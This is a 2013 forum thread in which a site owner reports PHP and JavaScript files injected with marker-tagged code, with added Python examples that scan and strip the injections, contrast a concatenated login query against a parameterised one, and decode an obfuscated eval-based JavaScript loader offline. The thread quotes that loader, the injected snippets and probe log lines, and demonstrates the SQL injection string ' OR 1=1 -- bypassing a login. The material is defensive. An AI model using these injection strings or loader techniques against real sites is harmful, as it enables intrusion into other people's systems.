tommyboy123x Posted August 1, 2013

I'm not sure this is the right place to post this, but here it goes... There seems to have been something that happened on July 26th - I haven't touched these files in months, yet this code has been added to the most common PHP files (like index.php, login.php) and EVERY JavaScript file. In the PHP files it is as follows:

<? #0f2490# echo('<img src=\"http://localhost/\" >'); #/0f2490# ?>

and in all my JavaScript files:

/*0f2490*/ document.write('<img src="http://localhost/" >'); /*0f2490*/

The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581

Was my server compromised? What steps can I take to ensure this doesn't happen again? It's on a VPS I manage, so I wouldn't be too surprised if I ****ed something up. Let me know what (if any) access logs you think may be relevant, or even where to begin with this problem. Thanks!
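Added example, not code from the post or from the site in question: the attacker wrapped every injected block in the same marker token, which makes it mechanical to find and strip. This Python script detects both the PHP form and the JavaScript form of the injection described above, reports infected files under a web root, and cleans them while keeping a .bak copy for forensics. The marker value 0f2490 is taken from the post; the sample file contents and file names are constructed.

```python
import os
import re
from pathlib import Path
from typing import Dict, List

# Marker token quoted in the post. Every injected block is bracketed with it.
MARKER = "0f2490"

# PHP form:  <? #0f2490# ... #/0f2490# ?>
# JS form:   /*0f2490*/ ... /*0f2490*/
# re.DOTALL lets a payload span lines; the non-greedy .*? stops at the first
# closing marker, so several blocks in one file are handled separately.
PHP_BLOCK = re.compile(
    r"<\?(?:php)?\s*#" + MARKER + r"#.*?#/" + MARKER + r"#\s*\?>\s*", re.DOTALL
)
JS_BLOCK = re.compile(
    r"/\*" + MARKER + r"\*/.*?/\*" + MARKER + r"\*/\s*", re.DOTALL
)


def find_injections(text: str) -> List[str]:
    """Return every marker-delimited block found in the file contents."""
    return PHP_BLOCK.findall(text) + JS_BLOCK.findall(text)


def strip_injections(text: str) -> str:
    """Return the contents with all marker-delimited blocks removed."""
    return JS_BLOCK.sub("", PHP_BLOCK.sub("", text))


def scan_tree(root: str, exts=(".php", ".js")) -> Dict[str, int]:
    """Walk a web root and report how many injected blocks each file carries.
    Read-only: cleaning is a separate, deliberate step."""
    hits: Dict[str, int] = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            n = len(find_injections(path.read_text(errors="replace")))
            if n:
                hits[str(path)] = n
    return hits


def clean_tree(root: str, exts=(".php", ".js")) -> List[str]:
    """Rewrite every infected file in place, saving the original as <name>.bak
    so the injected code survives for later analysis."""
    cleaned = []
    for path in scan_tree(root, exts):
        p = Path(path)
        original = p.read_text(errors="replace")
        p.with_suffix(p.suffix + ".bak").write_text(original)
        p.write_text(strip_injections(original))
        cleaned.append(path)
    return cleaned


# Constructed samples modelled on the two snippets quoted in the post.
SAMPLE_PHP = (
    "<? #0f2490# echo('<img src=\\\"http://localhost/\\\" >'); #/0f2490# ?>\n"
    "<?php\nsession_start();\necho 'hello';\n"
)
SAMPLE_JS = (
    "/*0f2490*/ document.write('<img src=\"http://localhost/\" >'); /*0f2490*/\n"
    "function legit() { return 1; }\n"
)

if __name__ == "__main__":
    for name, sample in (("index.php", SAMPLE_PHP), ("app.js", SAMPLE_JS)):
        print(name, "->", len(find_injections(sample)), "injected block(s)")
        print(strip_injections(sample))
```

Run scan_tree() first and compare its output against file modification times and the access log before cleaning; the marker is only a fingerprint of this one campaign, so a clean scan says nothing about whether the entry point itself is closed.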
lemmin Posted August 1, 2013

Are you actually looking at the files' source directly or through the web browser? It looks suspiciously like Cross Site Scripting (XSS - http://hwang.cisdept.csupomona.edu/swa/content/xss.htm). If those files have been edited on the disk, my first guess would be SQL injection, but there are numerous other possibilities. I would check EVERY log that you have. Access logs are a good place to start, but if you can find MySQL errors in your PHP logs, that is a red flag for injection.
tommyboy123x (Author) Posted August 1, 2013

I have this in my Apache logs:

[Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat

as well as a few other failed attempts at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config). In the access log I have this:

96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"
96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$
77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$

I'm still trying to track down my PHP error logs based on my php.ini files. I'll edit if found, but is any of this suspicious to you?
darkfreaks Posted August 2, 2013

Error string found: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use'
Joshua F Posted August 2, 2013

The only thing I could think of is an exploit somewhere, but if that's all they added I don't see the point of it, since that wouldn't even really do anything.
darkfreaks Posted August 2, 2013

Fix your MySQL error & injection in your script; read up on using PDO to sanitize and clean SQL injection (referring to login.php). However, doing so will NOT STOP CSRF attacks.
tommyboy123x (Author) Posted August 4, 2013

Thanks for the help - I thought login.php used mysql_real_escape_string. A few years back I went through pretty carefully looking for XSS possibilities and other things like that; this must have been updated since then. I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possibilities. Thanks!
darkfreaks Posted August 4, 2013

Let us know when this has been fixed, thanks.
tommyboy123x (Author) Posted August 5, 2013

It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings). I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time. It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start. I believe the attacker may have used this to gain write permissions. I also got lazy and made my FTP account the same group as Apache (and the owner of ALL web files), which may have contributed to this. Anyways, login.php should be fixed for this particular exploit. I'll keep this tab open and post in a couple of weeks when I do a complete analysis.
darkfreaks Posted August 5, 2013

The error is fixed; however, the exploit remains on your password field.
tommyboy123x (Author) Posted August 13, 2013

Could you elaborate? As far as I'm aware, there is no way to add an SQL injection on this form... it does pass the data without mysql_real_escape_string, but it also converts it into an MD5 hash before adding it to an SQL line. I also believe this may have been possible because of my lax permission set. A lot of these files were 775 by default, and I think 640 is really what I want. Could this have been the cause? I still can't find the PHP logs; can anyone tell me where to find clues that can help me piece together what happened? It is a Debian Squeeze environment.
darkfreaks Posted August 13, 2013 (edited)

mysql_real_escape_string has been deprecated as of PHP 5.5.0. You should be using the PDO extension; this will take care of your SQL injection. http://net.tutsplus.com/tutorials/php/why-you-should-be-using-phps-pdo-for-database-access/

My guess is yes: md5 can't cause SQL injection, but you probably are not escaping the password variable correctly. You would be better off using PDO.

Also, the md5() password algorithm is vulnerable to exploitation, as is sha1(). I would recommend using the Blowfish algorithm. http://www.techrepublic.com/blog/australian-technology/securing-passwords-with-blowfish/

Edited August 13, 2013 by darkfreaks
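Added example, not code from the thread or from the site being discussed: a Python/sqlite3 model of the login pattern the posts above argue about (password md5()'d before it reaches the query, username concatenated into the SQL string unescaped), next to a parameterised version, which is what PDO prepared statements with bound parameters give you in PHP. It shows concretely which field the concatenated query can be bypassed through and which it cannot. Because the Python standard library has no bcrypt, the password-storage part uses salted PBKDF2-SHA256 as a stand-in for PHP's password_hash(); the table name, columns and the sample user are assumed.

```python
import hashlib
import hmac
import os
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's users table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwhash TEXT)")
    db.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("tommy", hashlib.md5(b"correct horse").hexdigest()),
    )
    db.commit()
    return db


def login_concat(db: sqlite3.Connection, username: str, password: str) -> bool:
    """The pattern under discussion: the password is md5()'d, so only hex
    digits reach the query from that field, but the username is dropped
    straight into the SQL string."""
    pwhash = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND pwhash = '" + pwhash + "'"
    )
    return db.execute(sql).fetchone()[0] > 0


def login_param(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Same logic with bound parameters: user input is never parsed as SQL."""
    pwhash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND pwhash = ?",
        (username, pwhash),
    ).fetchone()
    return row[0] > 0


def hash_password(password: str, iterations: int = 200_000) -> str:
    """Salted, slow hash for storage. Stand-in for PHP password_hash()
    (bcrypt/Blowfish); the format below is this example's own."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    db = make_db()
    # Username field: the classic comment-based bypass works on the
    # concatenated query and fails on the parameterised one.
    print("concat, injected username:", login_concat(db, "' OR 1=1 -- ", "x"))
    print("param,  injected username:", login_param(db, "' OR 1=1 -- ", "x"))
    # Password field: md5() turns the payload into 32 hex digits first.
    print("concat, injected password:", login_concat(db, "nobody", "x' OR '1'='1"))
```

The sqlite3 module is used here only as a convenient stand-in for MySQL; the precedence behaviour (AND binding tighter than OR) and the `--` comment syntax that the bypass relies on are the same in both.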
tommyboy123x (Author) Posted August 18, 2013 (edited)

Damn, thank you so much dark.... I didn't realize how out of touch I was. I also wanted to give an update here - the attacker has attempted two other times to add some obfuscated JavaScript code to the js files... this is becoming a serious problem.

try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="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";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

How are you testing these injections? Are you convinced this is the cause of these attacks? When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect. I'll be back in a few days with the changes.

Edited August 18, 2013 by tommyboy123x
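Added example, not code from the post: the loader quoted above stores its real payload as a hex string, subtracts 14 from every byte and eval()s the result, so it can be decoded offline without running any of it. This Python script reverses that scheme, pulls the hex blob out of a loader with a regex, and rebuilds a sample in the same shape for testing. The hex blob in the post was removed from the page, so the sample here wraps a harmless constructed payload; it is not the attacker's real code. The offset 14 and the loader structure are taken from the snippet.

```python
import re

# What the quoted loader does (constants from the snippet in the post):
#   for (i = 0; i < a.length; i += 2) z.push(parseInt(a.substr(i, 2), 16) - 14);
#   eval(String.fromCharCode.apply(String, z));
# i.e. each character is stored as (charCode + 14) in two hex digits.
OFFSET = 14


def decode_payload(a: str) -> str:
    """Reverse the loader: hex pairs -> (value - OFFSET) -> characters."""
    if len(a) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", a):
        raise ValueError("payload must be an even-length hex string")
    return "".join(chr(int(a[i:i + 2], 16) - OFFSET) for i in range(0, len(a), 2))


def encode_payload(js: str) -> str:
    """Build a blob in the same scheme. Used here only to construct a sample;
    the real payload from the post is not reproduced."""
    return "".join(f"{ord(c) + OFFSET:02x}" for c in js)


# The blob sits in the loader as  a="<hex>";
LOADER_RE = re.compile(r'a\s*=\s*"([0-9a-fA-F]+)"\s*;')


def extract_from_loader(snippet: str) -> str:
    """Find the hex blob in an injected loader and decode it, executing nothing."""
    m = LOADER_RE.search(snippet)
    if not m:
        raise ValueError('no a="..." hex blob found in snippet')
    return decode_payload(m.group(1))


# Constructed sample: a harmless stand-in payload wrapped in the loader shape
# from the post. This is NOT the attacker's real payload.
SAMPLE_PAYLOAD = "document.write('<img src=\"http://localhost/\" >');"
SAMPLE_LOADER = (
    "try{if(window.document)--document.getElementById('12')}"
    'catch(qq){if(qq!=null)ss=eval("St"+"ring");}'
    'a="' + encode_payload(SAMPLE_PAYLOAD) + '";z=[];'
    "for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}"
    'eval(ss["fr"+"omCharCode"].apply(ss,z));'
)

if __name__ == "__main__":
    print(extract_from_loader(SAMPLE_LOADER))
```

Decoding the real blob this way tells you what the second-stage script does (typically a hidden iframe or a redirect to a hostile host), which is the indicator worth searching for in other files and in the access log; the loader itself is just packaging and changes between campaigns.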